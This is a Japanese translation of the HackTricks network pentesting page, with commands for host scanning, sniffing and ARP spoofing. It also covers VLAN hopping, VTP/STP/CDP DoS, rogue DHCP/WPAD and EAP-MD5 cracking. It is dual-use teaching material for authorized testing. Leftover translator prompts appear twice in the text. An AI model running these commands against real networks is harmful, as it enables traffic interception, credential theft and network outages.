hacktricks/generic-methodologies-and-resources/pentesting-network

ネットワークペネトレーションテスト

AWSハッキングをゼロからヒーローまで学ぶ htARTE (HackTricks AWS Red Team Expert)！

HackTricksをサポートする他の方法:

• HackTricksにあなたの会社を広告したい、またはHackTricksをPDFでダウンロードしたい場合は、サブスクリプションプランをチェックしてください！
• 公式PEASS & HackTricksグッズを入手する
• The PEASS Familyを発見する、私たちの独占的なNFTsのコレクション
• 💬 Discordグループに参加するか、テレグラムグループに参加するか、Twitter 🐦 @carlospolopmでフォローする。
• HackTricksとHackTricks CloudのgithubリポジトリにPRを提出して、あなたのハッキングのコツを共有する。

バグバウンティのヒント: Intigritiに登録する、ハッカーによって作られたプレミアムなバグバウンティプラットフォーム！今日https://go.intigriti.com/hacktricksに参加して、最大**$100,000**のバウンティを獲得し始めましょう！

{% embed url="https://go.intigriti.com/hacktricks" %}

外部からホストを発見する

これはインターネットから応答しているIPを見つける方法についての簡潔なセクションです。
この状況では、いくつかのIPスコープ（おそらく複数の範囲）があり、応答しているIPを見つけるだけです。

ICMP

これはホストが起動しているかどうかを発見する最も簡単で最も速い方法です。
ICMPパケットを送信して応答を期待することができます。最も簡単な方法は、エコーリクエストを送信して応答を期待することです。これは単純なpingや範囲用のfpingを使用して行うことができます。
また、nmapを使用して他の種類のICMPパケットを送信することもできます（これにより、一般的なICMPエコーリクエスト-レスポンスへのフィルターを回避できます）。

ping -c 1 199.66.11.4    # 1 echo request to a host
fping -g 199.66.11.0/24  # Send echo requests to ranges
nmap -PE -PM -PP -sn -n 199.66.11.0/24 #Send echo, timestamp requests and subnet mask requests

TCPポートの発見

ICMPパケットがフィルタリングされていることがよくあります。その場合、ホストが稼働しているかどうかを確認する唯一の方法は、オープンポートを探すことです。各ホストには65535ポートがありますが、"大きな"スコープを持っている場合、各ホストの各ポートが開いているかどうかをテストすることはできません。それには時間がかかりすぎます。
そのためには、高速なポートスキャナー（masscan）と、よく使われるポートのリストが必要です：

#Using masscan to scan top20ports of nmap in a /24 range (less than 5min)
masscan -p20,21-23,25,53,80,110,111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 199.66.11.0/24

以下は、ハッキング技術に関するハッキングの本の内容です。関連する英語のテキストを日本語に翻訳し、まったく同じマークダウンおよびHTML構文を保持して翻訳を返してください。コード、ハッキング技術名、ハッキング用語、クラウド/SaaSプラットフォーム名（Workspace、aws、gcpなど）、'leak'という単語、ペネトレーションテスト、およびマークダウンタグのようなものは翻訳しないでください。また、翻訳とマークダウン構文以外の余分なものは何も追加しないでください。

このステップは`nmap`を使用しても実行できますが、それは遅く、`nmap`はホストがアップしているのを識別するのに問題があります。

### HTTPポート発見

これは、**HTTP** **サービス**の発見に**焦点を当てたい場合**に役立つTCPポート発見です：

masscan -p80,443,8000-8100,8443 199.66.11.0/24

UDPポートの発見

UDPポートが開いているかどうかを確認し、特定のホストにより注意を払うべきかを判断することもできます。UDPサービスは通常、通常の空のUDPプローブパケットに何のデータも返さないため、ポートがフィルタリングされているのか開いているのかを判断するのは難しいです。これを判断する最も簡単な方法は、実行中のサービスに関連するパケットを送信することであり、どのサービスが実行されているかわからないため、ポート番号に基づいて最も可能性の高いものを試すべきです：

nmap -sU -sV --version-intensity 0 -F -n 199.66.11.53/24
# The -sV will make nmap test each possible known UDP service packet
# The "--version-intensity 0" will make nmap only test the most probable

以下のnmapコマンドは、/24 レンジ内の全ホストに対して トップ1000のUDPポート をテストしますが、これだけでも >20分 かかります。もし より速い結果 が必要なら、udp-proto-scanner を使用できます: ./udp-proto-scanner.pl 199.66.11.53/24 これは以下の UDPプローブ をそれぞれの 想定されるポート に送信します（/24 レンジでは約1分で完了します）: DNSStatusRequest, DNSVersionBindReq, NBTStat, NTPRequest, RPCCheck, SNMPv3GetRequest, chargen, citrix, daytime, db2, echo, gtpv1, ike,ms-sql, ms-sql-slam, netop, ntp, rpc, snmp-public, systat, tftp, time, xdmcp.

SCTPポート発見

#Probably useless, but it's pretty fast, why not trying?
nmap -T4 -sY -n --open -Pn <IP/range>

Wifiペネトレーションテスト

執筆時点で知られているすべてのWifi攻撃に関する優れたガイドをこちらで見つけることができます：

{% content-ref url="../pentesting-wifi/" %} pentesting-wifi {% endcontent-ref %}

内部からのホスト発見

ネットワーク内部にいる場合、最初に行いたいことの一つは、他のホストを発見することです。どれだけのノイズを出せる/出したいかに応じて、異なるアクションが実行される可能性があります：

パッシブ

これらのツールを使用して、接続されたネットワーク内でホストをパッシブに発見することができます：

netdiscover -p
p0f -i eth0 -p -o /tmp/p0f.log
# Bettercap
net.recon on/off #Read local ARP cache periodically
net.show
set net.show.meta true #more info

アクティブ

外部からホストを発見する (TCP/HTTP/UDP/SCTP ポート発見)でコメントされた技術は、ここでも適用可能です。
しかし、他のホストと同じネットワークにいるため、さらに多くのことを行うことができます：

#ARP discovery
nmap -sn <Network> #ARP Requests (Discover IPs)
netdiscover -r <Network> #ARP requests (Discover IPs)

#NBT discovery
nbtscan -r 192.168.0.1/24 #Search in Domain

# Bettercap
net.probe on/off #Discover hosts on current subnet by probing with ARP, mDNS, NBNS, UPNP, and/or WSD
set net.probe.mdns true/false #Enable mDNS discovery probes (default=true)
set net.probe.nbns true/false #Enable NetBIOS name service discovery probes (default=true)
set net.probe.upnp true/false #Enable UPNP discovery probes (default=true)
set net.probe.wsd true/false #Enable WSD discovery probes (default=true)
set net.probe.throttle 10 #10ms between probes sent (default=10)

#IPv6
alive6 <IFACE> # Send a pingv6 to multicast.

アクティブICMP

外部からホストを発見する (ICMP)でコメントされた技術はここでも適用可能です。
しかし、他のホストと同じネットワークにいるため、さらに多くのことができます：

• サブネットブロードキャストアドレスにpingを送ると、pingは各ホストに到達し、彼らはあなたに対して応答する可能性があります：ping -b 10.10.5.255
• ネットワークブロードキャストアドレスにpingを送ると、他のサブネット内のホストを見つけることができるかもしれません：ping -b 255.255.255.255
• nmapの-PE、-PP、-PMフラグを使用して、それぞれICMPv4エコー、タイムスタンプ、サブネットマスクリクエストを送信しながらホスト発見を行います：nmap -PE -PM -PP -sn -vvv -n 10.12.5.0/24

Wake On Lan

Wake On Lanは、ネットワークメッセージを通じてコンピューターをオンにするために使用されます。コンピューターをオンにするために使用されるマジックパケットは、MAC Dstが提供され、それが同じパケット内で16回繰り返されるだけのパケットです。
その後、この種のパケットは通常、イーサネット0x0842またはポート9へのUDPパケットで送信されます。
もし**[MAC]が提供されない場合、パケットはブロードキャストイーサネット**に送信されます（そしてブロードキャストMACが繰り返されるものになります）。

# Bettercap (if no [MAC] is specificed ff:ff:ff:ff:ff:ff will be used/entire broadcast domain)
wol.eth [MAC] #Send a WOL as a raw ethernet packet of type 0x0847
wol.udp [MAC] #Send a WOL as an IPv4 broadcast packet to UDP port 9

ホストのスキャン

すべてのIP（外部または内部）を発見したら、詳細にスキャンするためにさまざまなアクションを実行できます。

TCP

• Open ポート: SYN --> SYN/ACK --> RST
• Closed ポート: SYN --> RST/ACK
• Filtered ポート: SYN --> [NO RESPONSE]
• Filtered ポート: SYN --> ICMP メッセージ

# Nmap fast scan for the most 1000tcp ports used
nmap -sV -sC -O -T4 -n -Pn -oA fastscan <IP>
# Nmap fast scan for all the ports
nmap -sV -sC -O -T4 -n -Pn -p- -oA fullfastscan <IP>
# Nmap fast scan for all the ports slower to avoid failures due to -T4
nmap -sV -sC -O -p- -n -Pn -oA fullscan <IP>

#Bettercap Scan
syn.scan 192.168.1.0/24 1 10000 #Ports 1-10000

UDP

UDPポートをスキャンするには2つの方法があります:

• UDPパケットを送信し、ポートが閉じている場合は_ICMP到達不能_の応答を確認します（多くの場合、ICMPはフィルタリングされるため、ポートが閉じているか開いているかの情報を受け取ることができません）。
• サービスから応答を引き出すためにフォーマットされたデータグラムを送信します（例: DNS、DHCP、TFTPなど、_nmap-payloads_にリストされているもの）。応答を受け取った場合、ポートは開いているということです。

Nmapは"-sV"を使用して両方のオプションを組み合わせます（UDPスキャンは非常に遅いですが）、ただし、UDPスキャンはTCPスキャンよりも遅いことに注意してください：

# Check if any of the most common udp services is running
udp-proto-scanner.pl <IP>
# Nmap fast check if any of the 100 most common UDP services is running
nmap -sU -sV --version-intensity 0 -n -F -T4 <IP>
# Nmap check if any of the 100 most common UDP services is running and launch defaults scripts
nmap -sU -sV -sC -n -F -T4 <IP>
# Nmap "fast" top 1000 UDP ports
nmap -sU -sV --version-intensity 0 -n -T4 <IP>
# You could use nmap to test all the UDP ports, but that will take a lot of time

SCTP スキャン

SCTPはTCPとUDPの隣に位置します。IP 上での電話データの輸送を提供することを目的としており、プロトコルはSignaling System 7 (SS7)の信頼性機能の多くを複製し、SIGTRANとして知られるより大きなプロトコルファミリーを支えています。SCTPはIBM AIX、Oracle Solaris、HP-UX、Linux、Cisco IOS、VxWorksを含むオペレーティングシステムによってサポートされています。

nmapによって提供されるSCTPのための異なる2つのスキャンがあります: -sY と -sZ

# Nmap fast SCTP scan
nmap -T4 -sY -n -oA SCTFastScan <IP>
# Nmap all SCTP scan
nmap -T4 -p- -sY -sV -sC -F -n -oA SCTAllScan <IP>

IDSおよびIPS回避

{% content-ref url="ids-evasion.md" %} ids-evasion.md {% endcontent-ref %}

nmapの追加オプション

{% content-ref url="nmap-summary-esp.md" %} nmap-summary-esp.md {% endcontent-ref %}

内部IPアドレスの露見

誤設定されたルーター、ファイアウォール、およびネットワークデバイスは、時に非公開の送信元アドレスを使用してネットワークプローブに応答することがあります。テスト中にプライベートアドレスから受信したパケットを特定するために_tcpdump_を使用できます。この場合、Kali Linuxの_eth2_インターフェースは公衆インターネットからアドレス指定可能です（NATやファイアウォールの背後にいる場合、この種のパケットはおそらくフィルタリングされるでしょう）。

tcpdump –nt -i eth2 src net 10 or 172.16/12 or 192.168/16
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth2, link-type EN10MB (Ethernet), capture size 65535 bytes
IP 10.10.0.1 > 185.22.224.18: ICMP echo reply, id 25804, seq 1582, length 64
IP 10.10.0.2 > 185.22.224.18: ICMP echo reply, id 25804, seq 1586, length 64

スニッフィング

スニッフィングでは、キャプチャされたフレームやパケットを確認することで、IP範囲、サブネットサイズ、MACアドレス、ホスト名の詳細を学ぶことができます。ネットワークが誤って構成されているか、スイッチングファブリックがストレスを受けている場合、攻撃者はパッシブネットワークスニッフィングを通じて機密情報をキャプチャすることができます。

スイッチドイーサネットネットワークが適切に構成されている場合、ブロードキャストフレームと自分のMACアドレス宛のデータのみを見ることになります。

TCPDump

sudo tcpdump -i <INTERFACE> udp port 53 #Listen to DNS request to discover what is searching the host
tcpdump -i <IFACE> icmp #Listen to icmp packets
sudo bash -c "sudo nohup tcpdump -i eth0 -G 300 -w \"/tmp/dump-%m-%d-%H-%M-%S-%s.pcap\" -W 50 'tcp and (port 80 or port 443)' &"

リモートマシンからSSHセッションを介してWiresharkをGUIとしてリアルタイムでパケットをキャプチャすることもできます。

ssh user@<TARGET IP> tcpdump -i ens160 -U -s0 -w - | sudo wireshark -k -i -
ssh <USERNAME>@<TARGET IP> tcpdump -i <INTERFACE> -U -s0 -w - 'port not 22' | sudo wireshark -k -i - # Exclude SSH traffic

Bettercap

net.sniff on
net.sniff stats
set net.sniff.output sniffed.pcap #Write captured packets to file
set net.sniff.local  #If true it will consider packets from/to this computer, otherwise it will skip them (default=false)
set net.sniff.filter #BPF filter for the sniffer (default=not arp)
set net.sniff.regexp #If set only packets matching this regex will be considered

Wireshark

当然です。

資格情報のキャプチャ

https://github.com/lgandx/PCredz のようなツールを使用して、pcapまたはライブインターフェースから資格情報を解析することができます。

LAN攻撃

ARPスプーフィング

ARPスプーフィングは、あるマシンのIPが私たちのデバイスのMACを持っていることを示す無償のARPレスポンスを送信することで構成されます。その後、被害者はARPテーブルを変更し、スプーフィングされたIPに連絡したいたびに私たちのマシンに連絡します。

Bettercap

arp.spoof on
set arp.spoof.targets <IP> #Specific targets to ARP spoof (default=<entire subnet>)
set arp.spoof.whitelist #Specific targets to skip while spoofing
set arp.spoof.fullduplex true #If true, both the targets and the gateway will be attacked, otherwise only the target (default=false)
set arp.spoof.internal true #If true, local connections among computers of the network will be spoofed, otherwise only connections going to and coming from the Internet (default=false)

Arpspoof

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -t 192.168.1.1 192.168.1.2
arpspoof -t 192.168.1.2 192.168.1.1

MAC Flooding - CAM overflow

スイッチのCAMテーブルを異なるソースMACアドレスを持つ多数のパケットを送信してオーバーフローさせます。CAMテーブルがいっぱいになると、スイッチはハブのように振る舞い始めます（全てのトラフィックをブロードキャストします）。

macof -i <interface>

現代のスイッチでは、この脆弱性は修正されています。

802.1Q VLAN / DTP 攻撃

ダイナミックトランキング

DTP (Dynamic Trunking Protocol) は、自動トランキングシステムを提供するために設計されたリンク層プロトコルです。DTPを使用すると、スイッチはどのポートをトランクモード（Trunk）で動作させ、どのポートを動作させないかを決定します。DTP の使用は ネットワーク設計が不十分であることを示しています。 トランクは厳密に 必要な場所で使用され、文書化されるべきです。

デフォルトでは、すべてのスイッチポートはダイナミックオートモードで動作します。 これは、スイッチポートが隣接するスイッチからのトランク開始モードにあることを示しています。ペネトレーションテスターは物理的にスイッチに接続し、DTP Desirableフレームを送信する必要があります。これにより、ポートがトランクモードに切り替わります。攻撃者はその後、STPフレーム分析を使用してVLANを列挙し、仮想インターフェースを作成することでVLANセグメンテーションをバイパスできます。

多くのスイッチはデフォルトでDynamic Trunking Protocol (DTP)をサポートしていますが、敵はこれを悪用してスイッチをエミュレートし、すべてのVLANを通じてトラフィックを受信することができます。ツールdtpscan.shはインターフェースをスニッフィングし、スイッチがデフォルトモード、トランク、ダイナミック、オート、またはアクセスモード（これがVLANホッピングを避ける唯一のモードです）であるかを報告します。ツールはスイッチが脆弱かどうかを示します。

ネットワークが脆弱であることが発見された場合、Yersinia を使用して "トランキングを有効にする" 攻撃を "DTP" プロトコルを使用して起動し、すべてのVLANからのネットワークパケットを見ることができます。

apt-get install yersinia #Installation
sudo apt install kali-linux-large #Another way to install it in Kali
yersinia -I #Interactive mode
#In interactive mode you will need to select a interface first
#Then, you can select the protocol to attack using letter "g"
#Finally, you can select the attack using letter "x"

yersinia -G #For graphic mode

![](<../../.gitbook/assets/image (646) (1).png>)

VLANを列挙するために、スクリプト[**DTPHijacking.py**](https://github.com/in9uz/VLANPWN/blob/main/DTPHijacking.py)を使用してDTP Desirableフレームを生成することも可能です。どんな状況でもスクリプトを中断しないでください。これは3秒ごとにDTP Desirableを注入します。**スイッチ上で動的に作成されたトランクチャネルは5分間だけ存続します。5分後、トランクは切断されます。**

sudo python3 DTPHijacking.py --interface eth0

特定のVLANへの攻撃

VLAN IDとIP値がわかれば、特定のVLANを攻撃するために仮想インターフェースを設定できます。
DHCPが利用できない場合は、ifconfig を使用して静的IPアドレスを設定します。

root@kali:~# modprobe 8021q
root@kali:~# vconfig add eth1 250
Added VLAN with VID == 250 to IF -:eth1:-
root@kali:~# dhclient eth1.250
Reloading /etc/samba/smb.conf: smbd only.
root@kali:~# ifconfig eth1.250
eth1.250  Link encap:Ethernet  HWaddr 00:0e:c6:f0:29:65
inet addr:10.121.5.86  Bcast:10.121.5.255  Mask:255.255.255.0
inet6 addr: fe80::20e:c6ff:fef0:2965/64 Scope:Link
UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
RX packets:19 errors:0 dropped:0 overruns:0 frame:0
TX packets:13 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:2206 (2.1 KiB)  TX bytes:1654 (1.6 KiB)

root@kali:~# arp-scan -I eth1.250 10.121.5.0/24

# Another configuration example
modprobe 8021q
vconfig add eth1 20
ifconfig eth1.20 192.168.1.2 netmask 255.255.255.0 up

# Another configuration example
sudo vconfig add eth0 30
sudo ip link set eth0.30 up
sudo dhclient -v eth0.30

自動VLANホッパー

ダイナミックトランキングと仮想インターフェースの作成、および 他のVLAN内のホストの発見に関する議論された攻撃は、以下のツールによって自動的に実行されます: https://github.com/nccgroup/vlan-hopping---frogger

ダブルタギング

攻撃者が被害者ホストのMAC、IP、およびVLAN IDの値を知っている場合、指定されたVLANと被害者のVLANでフレームにダブルタグを付け、パケットを送信することができます。被害者は攻撃者に接続できないため、攻撃者にとって最良の選択肢はUDP経由で通信することです。これは、SNMPのようないくつかの興味深いアクションを実行できるプロトコルです。

攻撃者の別の選択肢は、攻撃者が制御し、被害者がアクセス可能なIP（おそらくインターネットを通じて）を偽装してTCPポートスキャンを実行することです。その後、攻撃者は、自分が所有する第二のホストで、被害者からのパケットを受信しているかどうかを嗅ぎ取ることができます。

この攻撃を実行するにはscapyを使用できます: pip install scapy

from scapy.all import *
# Double tagging with ICMP packet (the response from the victim isn't double tagged so it will never reach the attacker)
packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=20)/IP(dst='192.168.1.10')/ICMP()
sendp(packet)

Lateral VLAN Segmentation Bypass

直接接続しているスイッチにアクセスできる場合、ネットワーク内のVLANセグメンテーションをバイパスする能力があります。単にポートをトランクモードに切り替え（トランクとしても知られています）、ターゲットVLANのIDで仮想インターフェースを作成し、IPアドレスを設定します。アドレスを動的に（DHCP）要求するか、静的に設定することができます。ケースによります。

{% content-ref url="lateral-vlan-segmentation-bypass.md" %} lateral-vlan-segmentation-bypass.md {% endcontent-ref %}

Layer 3 Private VLAN Bypass

ゲストワイヤレスネットワークやその他の環境では、プライベートVLAN（ポート分離としても知られています）設定が使用されており、ピア間の相互作用を防ぐために使用されます（つまり、クライアントはワイヤレスアクセスポイントに接続できますが、互いにアドレスを指定することはできません）。ネットワークACLの有無に応じて、IPパケットをルーターまで送信し、その後隣接するピアに転送される可能性があります。

この攻撃は、クライアントのIPに特別に作成されたパケットをルーターのMACで送信します。その後、ルーターがパケットをクライアントにリダイレクトします。_Double Tagging Attacks_でのように、被害者がアクセス可能なホストを制御することで、この脆弱性を悪用できます。

VTP Attacks

**VTP（VLAN Trunking Protocol）**は、VLANを中央で管理するために設計されたプロトコルです。現在のVLANデータベースを追跡するために、スイッチは特別なリビジョン番号をチェックします。テーブルの更新が発生すると、リビジョン番号は1つ増加します。そして、より高いリビジョン番号の設定を検出したスイッチは、自動的にVLANデータベースを更新します。

VTPドメイン内の役割

• VTPサーバー。 VTPサーバーの役割を持つスイッチは、新しいVLANを作成したり、古いものを削除したり、VLAN自体の情報を変更することができます。また、ドメインメンバーの残りに対してVTPアナウンスを生成します。
• VTPクライアント。 この役割のスイッチは、ドメイン内の他のスイッチから特定のVTPアナウンスを受信し、自身のVLANデータベースを更新します。クライアントはVLANを作成する能力に限界があり、ローカルでVLAN設定を変更することさえ許されていません。言い換えると、読み取り専用アクセスです。
• VTPトランスペアレント。 このモードでは、スイッチはVTPプロセスに参加せず、VLAN設定の完全かつローカルな管理をホストできます。トランスペアレントモードで動作するスイッチは、他のスイッチからのVTPアナウンスを転送するだけで、自身のVLAN設定には影響しません。このようなスイッチは常にリビジョン番号がゼロであり、攻撃されることはありません。

アナウンスメントタイプ

• サマリーアナウンスメント — VTPサーバーが300秒（5分）ごとに送信するVTPアナウンスです。このアナウンスにはVTPドメイン名、プロトコルバージョン、タイムスタンプ、MD5設定ハッシュ値が格納されています。
• サブセットアナウンスメント — VLAN設定の変更が発生するたびに送信されるVTPアナウンスです。
• アナウンスメントリクエスト — VTPクライアントからVTPサーバーにサマリーアナウンスメントメッセージを要求するものです。通常、スイッチがより高い設定リビジョン番号を持つサマリーアナウンスメントを検出したときに応答して送信されます。

VTPはトランクポートからのみ攻撃できます。なぜなら、VTPアナウンスメントはトランクポートでのみブロードキャストされ、受信されるからです。 したがって、DTPを攻撃した後のペネトレーションテストでは、次のターゲットはVTPになる可能性があります。 VTPドメインを攻撃するには、Yersiniaを使用して、VTPインジェクトを実行し、VLANの データベースを消去してネットワークを麻痺させることができます。

{% hint style="info" %} VTPプロトコルには3つのバージョンがあります。この投稿では、最初のバージョンであるVTPv1に対する攻撃について説明しています {% endhint %}

yersinia -G #For graphic mode

VLANデータベースを完全に消去するには、deleting all VTP vlans オプションを選択します。

STP攻撃

インターフェースでBPDUフレームをキャプチャできない場合、STP攻撃を成功させることは難しいでしょう。

STP BPDU DoS

多くのBPDU TCP（Topology Change Notification）またはConf（トポロジーが作成されるときに送信されるBPDU）を送信すると、スイッチが過負荷になり、正しく動作しなくなります。

yersinia stp -attack 2
yersinia stp -attack 3
#Use -M to disable MAC spoofing

STP TCP Attack

TCPが送信されると、スイッチのCAMテーブルは15秒で削除されます。この種のパケットを継続的に送信している場合、CAMテーブルは継続的に（または15秒ごとに）再起動され、再起動時にスイッチはハブとして振る舞います。

yersinia stp -attack 1 #Will send 1 TCP packet and the switch should restore the CAM in 15 seconds
yersinia stp -attack 0 #Will send 1 CONF packet, nothing else will happen

STPルートアタック

攻撃者はスイッチの振る舞いを模倣して、ネットワークのSTPルートになります。そうすると、より多くのデータが攻撃者を経由します。これは、異なるスイッチに二つ接続している場合に興味深いです。
これは、優先度の値が実際のルートスイッチの優先度よりも低いと言うBPDUs CONFパケットを送信することによって行われます。

yersinia stp -attack 4 #Behaves like the root switch
yersinia stp -attack 5 #This will make the device behaves as a switch but will not be root

攻撃者が2つのスイッチに接続されている場合、新しいツリーのルートになり、それらのスイッチ間の全てのトラフィックが彼を通過することになります（MITM攻撃が実行されます）。

yersinia stp -attack 6 #This will cause a DoS as the layer 2 packets wont be forwarded. You can use Ettercap to forward those packets "Sniff" --> "Bridged sniffing"
ettercap -T -i eth1 -B eth2 -q #Set a bridge between 2 interfaces to forwardpackages

CDP 攻撃

CISCO Discovery Protocol は、CISCO デバイスが互いに通信するために使用されるプロトコルであり、誰が生きているかとその機能を発見します。

情報収集

デフォルトでは、CDP はすべてのポートにアナウンスを送信します。 しかし、侵入者が同じスイッチのポートに接続した場合はどうでしょうか？ ネットワークスニファーを使用して、Wireshark、 tcpdump または Yersinia であれば、デバイス自体に関する貴重な情報を抽出できます。これには、モデルから Cisco IOS バージョンまでの情報が含まれます。この情報を使用して、同じバージョンの Cisco IOS を列挙し、脆弱性を見つけてからそれを悪用することができます。

CDP フラッディング攻撃

実際の CISCO デバイスをシミュレートしてデバイスメモリを使い果たすことにより、CISCO スイッチに対して DoS 攻撃を行うことができます。

sudo yersinia cdp -attack 1 #DoS Attack simulating new CISCO devices
# Or you could use the GUI
sudo yersinia -G

CDPテーブルのフラッディング オプションを選択し、攻撃を開始します。スイッチのCPUが過負荷になり、CDPネイバーテーブルも同様に過負荷になり、「ネットワーク麻痺」を引き起こします。

CDPなりすまし攻撃

sudo yersinia cdp -attack 2 #Simulate a new CISCO device
sudo yersinia cdp -attack 0 #Send a CDP packet

以下は、ハッキング技術に関するハッキングの本の内容です。関連する英語のテキストを日本語に翻訳し、まったく同じマークダウンおよびhtml構文を保持して翻訳を返してください。コード、ハッキング技術名、ハッキング用語、クラウド/SaaSプラットフォーム名（Workspace、aws、gcpなど）、単語「leak」、ペネトレーションテスト、およびマークダウンタグのようなものは翻訳しないでください。また、翻訳とマークダウン構文以外の余分なものは何も追加しないでください。

[**scapy**](https://github.com/secdev/scapy/)も使用できます。`scapy/contrib`パッケージと共にインストールしてください。

### VoIP攻撃

従業員のVoice over Internet Protocol（VoIP）電話による使用を意図しているが、現代のVoIPデバイスはIoTデバイスとますます統合されています。多くの従業員は、特別な電話番号を使用してドアの施錠解除、部屋のサーモスタットの制御などができるようになりました...

ツール[**voiphopper**](http://voiphopper.sourceforge.net)は、Cisco、Avaya、Nortel、Alcatel-Lucent環境でVoIP電話の動作を模倣します。Cisco Discovery Protocol（CDP）、Dynamic Host Configuration Protocol（DHCP）、Link Layer Discovery Protocol Media Endpoint Discovery（LLDP-MED）、802.1Q ARPなど、サポートされているデバイス発見プロトコルの1つを使用して、音声ネットワークの正しいVLAN IDを自動的に発見します。

**VoIP Hopper**は**三つ**のCDPモードをサポートしています。**sniff**モードはネットワークパケットを検査し、VLAN IDを見つけようとします。使用するには、**`-c`**パラメータを`0`に設定します。**spoof**モードは、企業ネットワークで実際のVoIPデバイスが送信するようなカスタムパケットを生成します。使用するには、**`-c`**パラメータを**`1`**に設定します。**pre-madepacket**モードでのspoofは、Cisco 7971G-GE IP電話と同じパケットを送信します。使用するには、**`-c`**パラメータを**`2`**に設定します。

最後の方法を使用するのは、それが最も速いアプローチだからです。**`-i`**パラメータは攻撃者の**ネットワーク** **インターフェース**を指定し、**`-E`**パラメータは模倣される**VOIPデバイスの名前**を指定します。私たちは、CiscoのVoIP電話の命名形式と互換性のある名前SEP001EEEEEEEEEを選びました。形式は「SEP」に続いてMACアドレスが続きます。企業環境では、電話の背面にあるMACラベルを見ることで、既存のVoIPデバイスを模倣することができます。または、電話のディスプレイ画面で設定ボタンを押し、モデル情報オプションを選択するか、またはVoIPデバイスのイーサネットケーブルをラップトップに接続し、Wiresharkを使用してデバイスのCDPリクエストを観察することによっても可能です。

voiphopper -i eth1 -E 'SEP001EEEEEEEEE ' -c 2

If the tool executes successfully, the VLANネットワークは攻撃者のデバイスにIPv4アドレスを割り当てます。

DHCP攻撃

列挙

nmap --script broadcast-dhcp-discover
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-16 05:30 EDT
WARNING: No targets were specified, so 0 hosts scanned.
Pre-scan script results:
| broadcast-dhcp-discover:
|   Response 1 of 1:
|     IP Offered: 192.168.1.250
|     DHCP Message Type: DHCPOFFER
|     Server Identifier: 192.168.1.1
|     IP Address Lease Time: 1m00s
|     Subnet Mask: 255.255.255.0
|     Router: 192.168.1.1
|     Domain Name Server: 192.168.1.1
|_    Domain Name: mynet
Nmap done: 0 IP addresses (0 hosts up) scanned in 5.27 seconds

DoS

DoSの2種類がDHCPサーバーに対して実行可能です。1つ目は、すべての可能なIPアドレスを使用するために十分な偽のホストをシミュレートすることです。
この攻撃は、DHCPサーバーの応答を見ることができ、プロトコルを完了する場合にのみ機能します（Discover (Comp) --> Offer (server) --> Request (Comp) --> ACK (server)）。例えば、これはWifiネットワークでは不可能です。

DHCP DoSを実行する別の方法は、すべての可能なIPをソースコードとして使用してDHCP-RELEASEパケットを送信することです。すると、サーバーは誰もがIPの使用を終えたと考えます。

yersinia dhcp -attack 1
yersinia dhcp -attack 3 #More parameters are needed

以下は、ツール DHCPing を使用してより自動的に行う方法です。

DoS攻撃を使用してクライアントに新しいリースを取得させ、正当なサーバーを使い果たして応答できなくすることができます。そのため、正当なサーバーが再接続しようとすると、次の攻撃で述べられている悪意のある値をサーバーに設定できます。

悪意のある値を設定する

Responder DHCPスクリプト (/usr/share/responder/DHCP.py) を使用して、不正なDHCPサーバーを設立できます。悪意のあるゲートウェイを設定することは理想的ではありません。なぜなら、ハイジャックされた接続はハーフデュプレックス（つまり、クライアントからの出口パケットはキャプチャできますが、正当なゲートウェイからの応答はキャプチャできません）だからです。そのため、HTTPトラフィックや特にクレデンシャルをキャプチャするために、不正なDNSやWPADサーバーを設定することをお勧めします。

説明	例
ゲートウェイとして広告される私たちのIPアドレス	-i 10.0.0.100
ローカルDNSドメイン名（オプション）	-d example.org
元のルーター/ゲートウェイのIPアドレス	-r 10.0.0.1
プライマリDNSサーバーのIPアドレス	-p 10.0.0.100
セカンダリDNSサーバーのIPアドレス（オプション）	-s 10.0.0.1
ローカルネットワークのネットマスク	-n 255.255.255.0
DHCPトラフィックをリッスンするインターフェース	-I eth1
WPAD設定アドレス（URL）	_-w “http://10.0.0.100/wpad.dat\n”
デフォルトゲートウェイIPアドレスを偽装する	-S
すべてのDHCPリクエストに応答する（非常に騒々しい）	-R

EAP攻撃

ここでは、802.1X実装に対して使用できるいくつかの攻撃戦術を紹介します：

• EAPを介したアクティブなブルートフォースパスワード攻撃
• 不正なEAPコンテンツでRADIUSサーバーを攻撃する **（エクスプロイト）
• EAPメッセージのキャプチャとオフラインパスワードクラッキング（EAP-MD5およびPEAP）
• TLS証明書の検証をバイパスするためにEAP-MD5認証を強制する
• ハブなどを使用して認証後に悪意のあるネットワークトラフィックを注入する

攻撃者が被害者と認証サーバーの間にいる場合、必要に応じて認証プロトコルをEAP-MD5に低下させ、認証試行をキャプチャすることができます。その後、以下を使用してブルートフォースできます：

eapmd5pass –r pcap.dump –w /usr/share/wordlist/sqlmap.txt

FHRP (GLBP & HSRP) 攻撃

FHRP（First Hop Redundancy Protocol）は、ホット冗長ルーティングシステムを作成するために設計されたネットワークプロトコルのクラスです。FHRPを使用すると、物理ルーターを単一の論理デバイスに組み合わせることができ、耐障害性を高め、負荷を分散するのに役立ちます。

Cisco Systemsのエンジニアが開発した2つのFHRPプロトコル、GLBPとHSRPがあります。

{% content-ref url="glbp-and-hsrp-attacks.md" %} glbp-and-hsrp-attacks.md {% endcontent-ref %}

RIP

Routing Information Protocol（RIP）には3つのバージョンがあります—RIP、RIPv2、およびRIPng。RIPとRIPv2はUDPデータグラムをポート520経由でピアに送信し、RIPngはIPv6マルチキャストを介してUDPポート521にデータグラムをブロードキャストします。RIPv2はMD5認証のサポートを導入しました。RIPngはネイティブ認証を組み込んでいませんが、IPv6内のオプションのIPsec AHおよびESPヘッダーに依存しています。

このプロトコルを攻撃する方法の詳細については、書籍 Network Security Assessment: Know Your Network (第3版) を参照してください。

EIGRP 攻撃

EIGRP（Enhanced Interior Gateway Routing Protocol）は動的ルーティングプロトコルです。距離ベクトルプロトコルです。認証がなく、パッシブインターフェースの設定がない場合、侵入者はEIGRPルーティングに干渉し、ルーティングテーブルの汚染を引き起こす可能性があります。さらに、EIGRPネットワーク（つまり、自律システム）はフラットであり、どのゾーンにも分割されていません。攻撃者がルートを注入すると、そのルートは自律EIGRPシステム全体に広がる可能性が高いです。

